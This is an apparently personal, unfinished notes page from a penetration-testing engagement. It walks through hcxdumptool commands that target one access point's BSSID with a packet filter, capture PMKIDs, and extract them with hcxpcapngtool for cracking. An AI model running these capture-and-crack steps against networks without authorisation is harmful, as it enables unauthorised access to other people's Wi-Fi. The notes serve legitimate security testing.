hcxdumptool

This tool is awesome for wifi shenanigans.

info

For now I'm just dumping notes I gathered from a recent engagement where I needed to use this tool to capture/extract/crack PMKIDs.

Basic run of the tool

hcxdumptool -i NAME-OF-WIFI-INTERFACE

tip

Don't put in monitor mode first!

Once you see the BSSID you want to grab PMKIDs from, you need to build a Berkely Packet Filter, which was (simple as it may be to others) confusing to me. But here's the skinny.

hcxdumptool --bpfc="wlan addr1 112233445566 or wlan addr2 112233445566 or wlan addr3 112233445566" >> attack.bpf

Capture away!

hcxdumptool -i NAME-OF-PHYSICAL-WIFI-INTERFACE --bpf=attack.bpf -w output.pcapng --rds=1 -F

Extract away!

hcxpcapngtool -o pmkid.txt output.pcapng

And then follow this. This page is a work in progress.

Basic run of the tool​

Capture away!​

Extract away!​

Basic run of the tool

Capture away!

Extract away!